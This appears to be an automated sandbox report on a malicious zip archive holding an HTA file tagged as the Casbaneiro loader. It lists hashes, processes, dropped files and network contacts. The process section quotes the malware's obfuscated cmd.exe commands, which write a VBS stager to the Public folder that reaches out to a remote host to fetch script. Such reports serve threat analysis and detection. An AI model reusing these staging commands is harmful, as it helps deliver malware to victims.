File name:

❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zip

Full analysis: https://app.any.run/tasks/b2001ab1-01f9-446e-9260-1eb9b7c07714
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 21, 2024, 22:07:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
casbaneiro
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

E2C58C594980A65B7E43C2B205FB4BB3

SHA1:

8E6FB537FCEBAE9DB04E74811E1B2C481175DD02

SHA256:

07D9803515F5339F07C8EEAA47663C109CAD3C26AB02511E8089895D5661CB0F

SSDEEP:

6144:aqN08peZOYe+xLLVJOS8uFV7tWb9OSqi0Z7HADpbf1KeqTp4:a2JEO/qV5F/Wb9OSqN7HANbNDqTp4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • CASBANEIRO has been detected

      • cmd.exe (PID: 3244)
      • cmd.exe (PID: 444)
  • SUSPICIOUS

    • Uses TASKKILL.EXE to kill process

      • wscript.exe (PID: 1972)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2276)
      • cmd.exe (PID: 444)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 3244)
      • cmd.exe (PID: 444)
      • cmd.exe (PID: 3000)
      • cmd.exe (PID: 3108)
      • cmd.exe (PID: 2908)
      • wscript.exe (PID: 1972)
      • cmd.exe (PID: 1204)
    • Reads the Internet Settings

      • mshta.exe (PID: 2276)
    • Application launched itself

      • cmd.exe (PID: 444)
    • The process executes VB scripts

      • cmd.exe (PID: 1204)
  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 1404)
      • mshta.exe (PID: 2276)
    • Manual execution by a user

      • mshta.exe (PID: 2276)
      • wmpnscfg.exe (PID: 3032)
      • rundll32.exe (PID: 916)
    • Checks proxy server information

      • mshta.exe (PID: 2276)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:11:21 22:05:50
ZipCRC: 0x3024dab6
ZipCompressedSize: 218776
ZipUncompressedSize: 537424
ZipFileName: /\t/bdWxb97/ V9ODPP116MG7ZWBZTPGF7HB
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
14
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs mshta.exe #CASBANEIRO cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe taskkill.exe no specs wmpnscfg.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
444"C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"YTNZsrY5^=YTNZsrY5 ^& ^"oraleslevel"+YLLiY28+"tech/con/g1^":GetO^">>C:\Users\Public\\FfELc25.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\FfELc25.vbsC:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
916"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑨⑤③⑥①⑤⑦.htaC:\Windows\System32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
1176C:\Windows\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1204"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\FfELc25.vbsC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1404"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1972"C:\Windows\System32\WScript.exe" "C:\Users\Public\FfELc25.vbs" C:\Windows\System32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2276"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑨⑤③⑥①⑤⑦.hta" C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2648C:\Windows\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2908C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\FfELc25.vbs"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3000C:\Windows\system32\cmd.exe /S /D /c" set /p="YTNZsrY5=YTNZsrY5 & "oraleslevel"+YLLiY28+"tech/con/g1":GetO" 1>>C:\Users\Public\\FfELc25.vbs"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
18 228
Read events
18 057
Write events
153
Delete events
18

Modification events

(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(1404) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zip
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1404) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
5
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
2276mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:6A640992A6014742449764A62536B9C1
SHA256:7ECFD544701178FE429A294FF68D276D7698FF90014A25A8B87FD09FC9EDB396
2276mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\14760FA18FA66E42BC03480ECD95E701binary
MD5:72E32614A84CBC26002FE8EDE628D793
SHA256:59324B328BF1416489B96046C72DB3A8F92A3ECBA471FDBE77C18845E1F0ABFB
2276mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:DD1164476312D0E11838F2303E8EC135
SHA256:EDDB6F052841B68EF13DE4703C029AC1170D5AE5336C90D4B7DC929D817E53AF
2276mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:822467B728B7A66B081C91795373789A
SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9
1404WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1404.18729\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑨⑤③⑥①⑤⑦.htahtml
MD5:EAF63C8044F82563104ADEE93FE575C1
SHA256:1F3E4B476BB828249689FB05010FDB20E77599B4ACEB61AC96014E558191A5D2
2276mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\oaOP2OC651[1].vbstext
MD5:A9DC0897721E4EFA5885546A7849D4C8
SHA256:3E19922B11F6014816F904DE4E8C39F3ED542EB31C15F2E10A43F9104BA9C8DF
1972wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\g1[1].htmhtml
MD5:845FE3C0E1E0F54D9467DBAB920D7146
SHA256:11104927C2CDD43D72109D0861381EF362AC4191701253395932B064583C4C7F
1972wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\g1[1].txtxml
MD5:3F0E792891BC59443948A37FBC1ED868
SHA256:9AF7BAD9A88311D3467AB52701DDF143E10719BD0F674E01DEC26D4B69EA2E77
2276mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\14760FA18FA66E42BC03480ECD95E701binary
MD5:DF2A507E391A5612B9FD02E9CD4DF536
SHA256:F64556150F6F19BA24BAE9FC3243E94D6DA5688030D7AB4BEE5970DF7C87CA38
2276mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\QYTH511[1].jstext
MD5:B35F5BF65627CF6706B4C6B820D3C33C
SHA256:B15CFD066B9AC6D5C8A5CAE4BF6EAD69550B36D1977D260F882721438D37CA4A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
10
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2276
mshta.exe
GET
304
84.201.210.39:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e6e7f29e1d0501ff
unknown
whitelisted
2276
mshta.exe
GET
200
184.24.77.185:80
http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgQFACV4Xqd%2FmllhkDs1JPMkYg%3D%3D
unknown
whitelisted
1108
svchost.exe
GET
304
84.201.210.39:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?18040dd250b39d5a
unknown
whitelisted
2276
mshta.exe
GET
200
23.35.233.46:80
http://x1.c.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1108
svchost.exe
224.0.0.252:5355
whitelisted
2276
mshta.exe
104.192.42.61:443
oraleslevel.tech
VOICECALL
US
unknown
2276
mshta.exe
84.201.210.39:80
ctldl.windowsupdate.com
IP4NET Sp. z o.o.
PL
whitelisted
2276
mshta.exe
23.35.233.46:80
x1.c.lencr.org
AKAMAI-AS
DE
whitelisted
2276
mshta.exe
184.24.77.185:80
e5.o.lencr.org
Akamai International B.V.
DE
whitelisted
1972
wscript.exe
104.192.42.61:443
oraleslevel.tech
VOICECALL
US
unknown
1108
svchost.exe
84.201.210.39:80
ctldl.windowsupdate.com
IP4NET Sp. z o.o.
PL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.110
whitelisted
oraleslevel.tech
  • 104.192.42.61
unknown
ctldl.windowsupdate.com
  • 84.201.210.39
  • 84.201.210.19
  • 217.20.57.25
  • 217.20.57.41
  • 84.201.210.21
  • 84.201.210.38
  • 84.201.210.22
whitelisted
x1.c.lencr.org
  • 23.35.233.46
whitelisted
e5.o.lencr.org
  • 184.24.77.185
  • 184.24.77.179
whitelisted

Threats

No threats detected
No debug info